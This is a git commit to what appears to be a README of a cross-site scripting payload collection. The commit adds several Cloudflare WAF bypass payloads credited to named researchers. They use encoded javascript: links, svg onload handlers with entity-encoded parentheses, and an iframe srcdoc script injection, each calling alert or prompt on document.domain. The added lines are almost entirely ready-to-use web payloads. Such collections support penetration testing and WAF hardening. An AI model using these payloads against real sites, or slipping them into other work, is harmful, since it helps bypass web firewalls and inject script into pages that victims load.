Added more bypasses via @c0d3g33k and h1_ragnar

2025-02-04 17:05:17 -05:00 · 2019-06-05 07:28:10 +05:30 · 2019-06-05 07:28:10 +05:30 · 4db5c00386
commit 4db5c00386
parent 7f27dd47bc
1 changed files with 10 additions and 0 deletions
--- a/README.md
+++ b/README.md
@ -2737,6 +2737,16 @@ http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3csc
 ``` 

 ### Cloudflare
+- XSS Bypass by [@c0d3g33k](https://twitter.com/c0d3g33k)
+```
+<a+HREF='javascrip%26%239t:alert%26lpar;document.domain)'>test</a>
+```
+- XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar)
+```
+<svg onload=prompt%26%230000000040document.domain)>
+<svg onload=prompt%26%23x000000028;document.domain)>
+xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
+```
 - XSS Bypass by [@RakeshMane10](https://twitter.com/rakeshmane10)
 ```
 <svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f